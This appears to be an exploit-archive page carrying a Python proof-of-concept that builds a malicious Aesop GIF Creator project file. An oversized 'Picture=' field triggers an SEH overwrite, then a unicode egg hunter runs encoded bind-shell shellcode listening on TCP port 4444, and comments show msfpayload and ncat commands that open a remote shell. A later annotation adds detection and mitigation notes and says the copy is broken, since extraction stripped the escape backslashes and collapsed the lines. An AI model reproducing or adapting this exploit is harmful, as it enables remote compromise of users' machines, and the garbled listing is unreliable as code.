
Aesop GIF Creator 2.1 Buffer Overflow

Posted on 17 December 2010

# !/usr/bin/python # Exploit Title: Aesop GIF Creator <= v2.1 (.aep) Buffer Overflow Exploit # Date: 12/15/2010 # Author: xsploitedsec # URL: http://www.x-sploited.com/ # Contact: xsploitedsec [at] x-sploited.com # Software Link: http://www.yukudr.com/_h84561/aesop_setup.exe # Vulnerable version: <= v2.1 # Tested on: Windows XP SP3 Eng # CVE : N/A #### Software Description: # Aesop is a powerful tool that allows you to create animated GIF images (banners, buttons, labels and headings) # for your website and even GIF wallpapers for your mobile phone quickly and easily (click to see samples). You # can use antialiased 3D-Text, shapes (rectangles, rounded rectangles, ellipses and polygons) and external # pictures for drawing in your GIF. # Convenient interface. # Unicode support - you can use national characters as Text in your GIF. # An excellent antialiasing technique (blurring the edges between color transitions) to draw 3D-Text and shapes: #### Exploit information: # Aesop is prone to a buffer overflow when handling malicious Aesop project files. The vulnerability # is due to improper bounds checking of the "Picture=" field, which can be exploited by malicious people to # compromise a user's system. #### Other information: # I attempted to reach out to the vendor about this, but after a few short emails it became clear that they # had no interest in verifying it or coordinating a fix, so here's the exploit. #### Notes: # I always knew that one day I would end up needing to deal with unicode buffers. After a couple of nights of # tinkering around this is the end result. P.S. - When all else fails->Fail harder #### Shoutz: # kAoTiX, Sheep, Tu, edb-team, corelan team, packetstormsecurity and all other security researchers and sites. # -> A big thanks goes to corelanc0d3r for shedding some light on the subject of unicode exploits. 
# NOTE(review): published proof-of-concept listing, reproduced as-is. It is Python 2
# (`print about`) and the page extraction has collapsed the script onto a few lines and
# stripped the backslash from every "\x.." escape, so the string literals below are plain
# text such as "x41" rather than the intended bytes. This copy therefore does not build the
# file the author describes and is not runnable in this form; it is kept for reference only.
# Defender view (grounded in the listing itself):
# - Trigger: an .aep project file whose "Picture=" value is far longer than any legitimate
#   project would carry (the listing pads the file out to 5000 bytes). A content filter or
#   mail/web gateway rule that flags "[Aesop Project File v.2.0]" files with an oversized
#   "Picture=" field is a cheap detection.
# - Technique, as described in the comments: SEH overwrite with a fixed address taken from
#   Aesop.exe, then an egg hunter that locates a bind shell listening on TCP 4444.
#   Host firewall rules and alerting on new listening ports would surface a successful run;
#   module rebasing / ASLR would presumably break the fixed-address step -- not verified here.
# - Mitigation: the header states no vendor fix was coordinated, so treat .aep files from
#   untrusted sources as hostile and run the application under a non-administrative account.
;) import struct import sys about = " ================================================================== " about += " Title: Aesop GIF Creator <= v2.1 (.aep) Buffer Overflow Exploit PoC " about += " Author: xsploitedsec URL: http://www.x-sploited.com/ " about += " Contact: xsploitedsecurity [at] x-sploited.com " about += "==================================================================" print about # root@bt:~# msfpayload windows/shell_bind_tcp lport=4444 lhost=0.0.0.0 EXITFUNC=seh R # | msfencode -e x86/alpha_upper -c 1 -t c -b 'x1ax19x0a' > /tmp/aesop.txt # [*] x86/alpha_upper succeeded with size 752 (iteration=1) # # root@bt:~# ncat 10.0.1.16 4444 # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # C:> # Unmolested, ASCII shellcode buried in stack ftw!? bindshell = ( "xdaxcaxd9x74x24xf4x58x50x59x49x49x49x43x43x43" "x43x43x43x43x51x5ax56x54x58x33x30x56x58x34x41" "x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42" "x54x41x41x51x32x41x42x32x42x42x30x42x42x58x50" "x38x41x43x4ax4ax49x4bx4cx4dx38x4bx39x43x30x43" "x30x43x30x43x50x4dx59x4dx35x50x31x4ex32x42x44" "x4cx4bx51x42x50x30x4cx4bx46x32x44x4cx4cx4bx50" "x52x44x54x4cx4bx44x32x47x58x44x4fx48x37x50x4a" "x47x56x50x31x4bx4fx46x51x4fx30x4ex4cx47x4cx45" "x31x43x4cx44x42x46x4cx47x50x4fx31x48x4fx44x4d" "x43x31x48x47x4dx32x4cx30x50x52x51x47x4cx4bx51" "x42x42x30x4cx4bx47x32x47x4cx43x31x48x50x4cx4b" "x47x30x44x38x4cx45x4fx30x43x44x50x4ax43x31x48" "x50x46x30x4cx4bx51x58x44x58x4cx4bx51x48x51x30" "x43x31x4ex33x4ax43x47x4cx47x39x4cx4bx50x34x4c" "x4bx45x51x4ex36x46x51x4bx4fx46x51x49x50x4ex4c" "x4fx31x48x4fx44x4dx43x31x48x47x50x38x4bx50x42" "x55x4cx34x45x53x43x4dx4bx48x47x4bx43x4dx51x34" "x42x55x4ax42x50x58x4cx4bx46x38x51x34x45x51x48" "x53x45x36x4cx4bx44x4cx50x4bx4cx4bx50x58x45x4c" "x43x31x4ex33x4cx4bx45x54x4cx4bx45x51x48x50x4c" "x49x47x34x46x44x47x54x51x4bx51x4bx45x31x46x39" "x51x4ax50x51x4bx4fx4bx50x51x48x51x4fx51x4ax4c" "x4bx42x32x4ax4bx4cx46x51x4dx43x58x47x43x46x52" 
"x45x50x45x50x45x38x43x47x44x33x47x42x51x4fx51" "x44x43x58x50x4cx42x57x46x46x43x37x4bx4fx49x45" "x4fx48x4ax30x43x31x43x30x45x50x51x39x49x54x51" "x44x46x30x43x58x51x39x4bx30x42x4bx43x30x4bx4f" "x4ex35x46x30x46x30x50x50x50x50x47x30x50x50x51" "x50x50x50x45x38x4ax4ax44x4fx49x4fx4dx30x4bx4f" "x4ex35x4bx39x48x47x46x51x49x4bx51x43x45x38x44" "x42x45x50x42x31x51x4cx4bx39x4bx56x42x4ax44x50" "x51x46x46x37x45x38x49x52x49x4bx50x37x45x37x4b" "x4fx4ex35x46x33x51x47x43x58x48x37x4ax49x47x48" "x4bx4fx4bx4fx4ex35x50x53x46x33x46x37x42x48x43" "x44x4ax4cx47x4bx4dx31x4bx4fx4ex35x50x57x4bx39" "x49x57x42x48x44x35x42x4ex50x4dx45x31x4bx4fx49" "x45x45x38x43x53x42x4dx45x34x43x30x4cx49x4bx53" "x50x57x50x57x51x47x46x51x4ax56x43x5ax45x42x50" "x59x50x56x4dx32x4bx4dx43x56x48x47x51x54x47x54" "x47x4cx43x31x43x31x4cx4dx51x54x51x34x44x50x4f" "x36x43x30x51x54x50x54x46x30x46x36x46x36x46x36" "x51x56x50x56x50x4ex50x56x50x56x50x53x46x36x43" "x58x44x39x48x4cx47x4fx4dx56x4bx4fx49x45x4cx49" "x4dx30x50x4ex46x36x47x36x4bx4fx46x50x42x48x43" "x38x4bx37x45x4dx43x50x4bx4fx48x55x4fx4bx4bx4e" "x44x4ex46x52x4bx5ax43x58x4ex46x4cx55x4fx4dx4d" "x4dx4bx4fx48x55x47x4cx45x56x43x4cx45x5ax4bx30" "x4bx4bx4dx30x43x45x43x35x4fx4bx47x37x45x43x43" "x42x42x4fx42x4ax43x30x51x43x4bx4fx4ex35x45x5a" "x41x41" ); # unicode encoded, egg="w00t" egg_hunter = ( "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ" "1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AY" "AZBABABABAB30APB944JBQVE1HJKOLOPB0RBJLBQHHMNNOLM5PZ44J" "O7H2WP0P0T4TKZZFOSEZJ6OT5K7KO9WA" ); # aesop project file header prj_header = ( "x5Bx41x65x73x6Fx70x20x50x72x6Fx6Ax65x63x74x20x46x69x6C" "x65x20x76x2Ex32x2Ex30x5Dx0Dx0Ax7Bx50x69x63x74x75x72x65" "x3D" ); #hunter tag ="w00tw00t" egg = "x77x30x30x74x77x30x30x74"; seh_offset = 669; # Begin payload buffer payload = "x41" * seh_offset; # NSEH payload += "x61"; #popad payload += "x73"; #nopalign/add byte ptr [ebx],dh # SE handler payload += "xB1x42"; #unicode compatible p/p/r - Aesop.exe (universal) # Prepare/jump->EAX 
payload += "x73"; #venetian/add byte ptr [ebx],dh payload += "x55"; #push ebp payload += "x73"; #venetian/add byte ptr [ebx],dh payload += "x58"; #pop eax payload += "x73"; #venetian/add byte ptr [ebx],dh payload += "x05x19x11"; #add eax, 0x19002200h payload += "x73"; #venetian/add byte ptr [ebx],dh payload += "x2dx11x11"; #sub eax, 0x12007200h payload += "x73"; #venetian/add byte ptr [ebx],dh payload += "x50"; #push eax payload += "x73"; #add byte ptr [ebx],dh payload += "xc3"; #ret payload += "x41" * 242; #align egghunter with->(ebp+650) payload += egg_hunter; payload += "x41" * 1000; #give shellcode some breathing room payload += egg; payload += bindshell; payload += "x44" * (5000-len(payload)); #junk padding # End payload buffer xsploitme = (prj_header + payload); print(" [*] Creating file->xsploited.aep"); try: out_file = open("xsploited.aep",'w'); out_file.write(xsploitme); out_file.close(); print("[+] xsploited.aep created successfully"); print("[*] 1. Launch the file or open it via Aesop.exe"); print("[*] 2. Wait a sec for egghunter and netcat in :) [-] Exiting... "); except (IOError): print("[!] Error creating file [-] Exiting... ");

 
